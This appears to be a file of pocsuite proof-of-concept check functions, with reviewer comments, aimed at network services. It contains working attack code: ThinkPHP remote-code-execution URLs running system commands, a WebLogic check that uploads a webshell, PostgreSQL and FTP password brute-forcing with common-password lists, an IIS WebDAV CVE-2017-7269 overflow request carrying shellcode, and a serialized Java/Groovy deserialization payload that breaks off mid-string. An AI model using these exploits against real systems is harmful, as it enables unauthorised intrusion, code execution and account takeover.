def _verify(self):
    """Check whether CouchDB's ``/_config/`` endpoint answers without credentials.

    The host and port are taken from ``self.url`` (an explicit ``:<port>`` wins,
    otherwise CouchDB's default 5984).  A 200 reply records a VerifyInfo entry
    with ``self.url`` and the probed URL; any transport error is printed and
    treated as "not confirmed".  Always returns ``self.save_output(result)``.
    """
    import re
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = '5984'
    url = 'http://%s:%s/_config/' % (_host, _port)
    try:
        # verify=False is inert for a plain-http probe; kept as the original had it.
        status = req.get(url, timeout=5, allow_redirects=True, verify=False).status_code
        if status == 200:
            result['VerifyInfo'] = {'URL': self.url, 'Payload': url}
    except Exception as e:
        print(e)
    print('[+]26 poc done')
    return self.save_output(result)
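def _verify(self):
    """Probe for SSH username enumeration through the external ``checkUsername`` helper.

    Host and port come from ``self.url`` (port from the URL, else 22).  The TCP
    port is checked for reachability first; ``checkUsername`` answering ``"1"``
    is recorded as VerifyInfo.  Returns ``self.save_output(result)``.

    Fixes: the pre-check socket was never closed when ``connect()`` raised, and
    a port parsed from the URL was handed to ``connect()`` as a string (which
    raises TypeError and was silently reported as "unreachable"); unused
    ``time``/``ftplib`` imports are dropped.
    """
    import re
    import socket
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], int(host_and_port[1])
    else:
        _host = url2ip(vul_url)
        _port = 22
    # Reachability pre-check; the socket is released on every path.
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host, _port))
    except Exception:
        return self.save_output(result)
    finally:
        sk.close()
    if checkUsername("rootasdf23", _host) == "1":
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = _host
        result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8")
    return self.save_output(result)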
def _verify(self):
    # Original comment: "call the fingerprint method".
    result = {}
    # Port from the URL if one was given, otherwise the default.
    import re
    vul_url = "%s" % self.url
    # url2ip is expected from file scope (its import is commented out here).
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = "7001"
    vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
    try:
        # Redirects disabled so a login bounce is not mistaken for the page.
        response = req.get(url=vul_ip, timeout=5, allow_redirects=False)
        if (response.status_code == 200 and "WSDL" in response.text):
            url = "/ws_utc/resources/setting/keystore"
            target = "http://%s:%s/" % (_host, _port)
            # NOTE(review): upload_webshell (defined elsewhere) writes to the
            # target; its return value is used as the Payload field verbatim.
            response = upload_webshell(target, url)
            if (response != ""):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = response
                return self.save_output(result)
    except Exception as e:
        print e
        pass
    return self.save_output(result)
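def _verify(self):
    """Report whether the external ``ssltest`` helper flags the target's TLS endpoint.

    Host and port come from ``self.url`` (port from the URL, else 443).  A
    ``"check"`` answer from ``ssltest`` is recorded as VerifyInfo.  Always ends
    with ``self.save_output(result)``.

    Fix: the positive branch referenced the undefined names ``host`` and
    ``payload``; the resulting NameError was swallowed by a bare ``except``, so
    a flagged target was never reported.  ``self.url`` and the probed
    ``host:port`` are recorded instead, and the except is narrowed to
    ``Exception`` with the error printed.
    """
    import re
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = 443
    try:
        if ssltest(_host, _port) == "check":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            # No request body is built in this method; record the probed endpoint.
            result['VerifyInfo']['Payload'] = '%s:%s' % (_host, _port)
    except Exception as e:
        print(e)
    print('[+]20 poc done')
    return self.save_output(result)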
def _verify(self):
    # Original comment: "call the fingerprint method".
    result={}
    # Port from the URL if one was given, otherwise the default.
    import re
    import socket
    import time
    vul_url = "%s"%self.url
    # url2ip is expected from file scope (its import is commented out here).
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = int(url2ip(vul_url)[1])
    else :
        _host = url2ip(vul_url)
        _port = 80
    # Reachability pre-check (original comment: "check whether the port is open").
    # NOTE(review): the socket is not closed when connect() raises.
    import socket
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host,_port))
    except Exception:
        return self.save_output(result)
    sk.close()
    vul_ip = "http://%s:%s/" % (_host, _port)
    # NOTE(review): `payloads` is built but never used; only `payloads2` is sent.
    payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222", "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222", "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222", "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
    payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls", "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir", "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
    for p in payloads2:
        url=vul_ip+p
        try:
            text = req.get(url,timeout=4).text
            # Either a directory listing or a phpinfo page counts as confirmation.
            if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            print e
            pass
    return self.save_output(result)
def _verify(self):
    import psycopg2
    # Original comment: "call the fingerprint method".
    result = {}
    # Candidate passwords; '{user}' is replaced with 'postgres' below.
    passwd = [ '123456', 'admin', 'root', 'password', '123123', '123', '1', '', '{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016', '{user}2015', '{user}!', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin' ]
    import re
    from pocsuite.lib.utils.funs import url2ip
    _port = re.findall(':(\d+)\s*', self.url)
    if len(_port) != 0:
        _host = url2ip(self.url)[0]
        _port = url2ip(self.url)[1]
    else:
        _host = url2ip(self.url)
        _port = "5432"
    print _host, _port
    # Reachability pre-check.
    # NOTE(review): the socket is not closed when connect() raises.
    import socket
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host, _port))
    except Exception:
        print 'port not alive'
        return self.save_output(result)
    sk.close()
    output = Output(self)  # unused
    message = ''
    for pwd in passwd:
        try:
            pwd = pwd.replace('{user}', 'postgres')
            # The user name is redacted in this copy of the file.
            conn = psycopg2.connect(host=_host, port=_port, user='******', password=pwd)
            # Message: "<host> port 5432 Postgresql has a weak password: postgres <pwd>".
            message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format( _host, pwd)
            print "有弱口令漏洞"
            conn.close()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url
            result['VerifyInfo']['Payload'] = message
            break
        except Exception as e:
            print e
    print '[+]29 poc done'
    return self.save_output(result)
def _verify(self):
    result = {}
    vul_url = '%s' % self.url
    import re
    import time
    import ftplib
    from pocsuite.lib.utils.funs import url2ip
    # Port from the URL if one was given, otherwise the default.
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = int(url2ip(vul_url)[1])
    else:
        _host = url2ip(vul_url)
        _port = 21
    # Reachability pre-check (original comment: "check whether the port is open").
    # NOTE(review): the socket is not closed when connect() raises.
    import socket
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host, _port))
    except Exception:
        return self.save_output(result)
    sk.close()
    flag = False  # unused
    payload = "弱口令"  # "weak password"; unused
    username = [ 'anonymous', ]
    password = [ "", "toor", "1234", "123456", "admin", "Admin", "ADMIN", "admin123", "Admin123", "root", "root123", "123.com" '123456', 'admin', 'root', 'password', '123123', '123', '1', '', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin' ]
    for u in username:
        for p in password:
            # Default timeout applies to the connect() inside ftplib.
            socket.setdefaulttimeout(1)
            ftp = ftplib.FTP()
            try:
                print u, p
                ftp.connect(_host, _port)
                ftp.login(u, p)
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = _host
                result['VerifyInfo']['Payload'] = u + p
                return self.save_output(result)
            except Exception, e:
                ftp.close()
                continue
    # NOTE(review): no return here, so when no login is accepted the method
    # yields None instead of self.save_output(result) like the sibling checks.
def _verify(self):
    # Find the web port after the colon in the URL; default 80.
    import re
    _port = re.findall(':(\d+)\s*', self.url)
    if len(_port) != 0:
        _port = url2ip(self.url)[1]
    else:
        _port = 80
    ip = url2ip(self.url)
    import socket
    result={}
    # Raw PROPFIND request whose If: header carries the overlong resource names.
    pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
    pay += 'If: <http://localhost/aaaaaaa'
    pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
    pay += '>'
    pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
    pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
    shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
    pay += shellcode
    pay += '>\r\n\r\n'
    # NOTE(review): connect() and send() are outside the try, so a closed port
    # raises out of the method; no timeout is set on the socket.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, _port))
    sock.send(pay)
    try:
        data = sock.recv(80960)
    except:
        # NOTE(review): `data` is left unbound here, so the print/find below
        # raise NameError after a failed recv().
        print '连接失败'
        pass
    print '-'*18+'\n'
    print data
    print '-'*18+'\n'
    sock.close()
    # Success is recognised by a fixed marker in the server's reply.
    if not -1 == data.find('HHIT CVE-2017-7269 Success'):
        message = '%s is vulnerable!' %ip + 'CVE-2017-7269 vulnerability!'
        print(message)
        result['VerifyInfo'] = {}
        result['VerifyInfo']['url'] = ip
        result['VerifyInfo']['Payload'] = pay
        # NOTE(review): returns a bool instead of self.save_output(result), so
        # the populated result is discarded; the final return is unreachable.
        return True
    else:
        print '没有发现关键字.'
        return False
    return self.save_output(result)
def _verify(self):
    import socket
    result = {}
    vul_url = '%s' % self.url
    # Port from the URL if one was given, otherwise the default.
    import re
    from pocsuite.lib.utils.funs import url2ip
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = "10001"
    # Serialized-object prefix (original comment: "jar header").
    payload_one = '\x4a\x52\x4d\x49\x00\x02\x4b\x00\x0d\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x30\x34\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x12\x70\x77\x6e\x65\x64\x39\x37\x34\x31\x30\x30\x36\x31\x34\x30\x31\x32\x33\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x72\x00\x2c\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x74\x65\x64\x43\x6c\x6f\x73\x75\x72\x65\x10\x23\x37\x19\xf7\x15\xdd\x1b\x02\x00\x01\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x70\x78\x72\x00\x2d\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x73\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x10\x23\x37\x1a\xd6\x01\xbc\x1b\x02\x00\x02\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x68\x61\x6e\x64\x6c\x65\x43\x61\x63\x68\x65\x74\x00\x28\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x3b\x70\x78\x70\x73\x72\x00\x29\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x4d\x65\x74\x68\x6f\x64\x43\x6c\x6f\x73\x75\x72\x65\x11\x0e\x3e\x84\x8f\xbd\xce\x48\x02\x00\x01\x4c\x00\x06\x6d\x65\x74\x68\x6f\x64\x71\x00\x7e\x00\x0f\x70\x78\x72\x00\x13\x67\x72\x6f\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x6f\x73\x75\x72\x65\x3c\xa0\xc7\x66\x16\x12\x6c\x5a\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\x6d\x61\x78\x69\x6d\x75\x6d\x4e\x75\x6d\x62\x65\x72\x4f\x66\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x73\x49\x00\x0f\x72\x65\x73\x6f\x6c\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4c\x00\x03\x62\x63\x77\x74\x00\x3c\x4c\x6f\x72\x67\x2f\x63\x6f\x64\x65\x68\x61\x75\x73\x2f\x67\x72\x6f\x6f\x76\x79\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x63\x61\x6c\x6c\x73\x69\x74\x65\x2f\x42\x6f\x6f\x6c\x65\x61\x6e\x43\x6c\x6f\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3b\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x71\x00\x7e\x00\x11\x4c\x00\x05\x6f\x77\x6e\x65\x72\x71\x00\x7e\x00\x11\x5b\x00\x0e\x70\x61\x72\x61\x6d\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x0a\x74\x68\x69\x73\x4f\x62\x6a\x65\x63\x74\x71\x00\x7e\x00\x11\x70\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74\x00'
    # Serialized-object suffix (original comment: "jar tail").
    payload_three = '\x71\x00\x7e\x00\x19\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x76\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x76\x72\x00\x0c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x46\x69\x6c\x65\x04\x2d\xa4\x45\x0e\x0d\xe4\xff\x03\x00\x01\x4c\x00\x04\x70\x61\x74\x68\x71\x00\x7e\x00\x0f\x70\x78\x70\x70\x74\x00\x07\x65\x78\x65\x63\x75\x74\x65\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x70\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3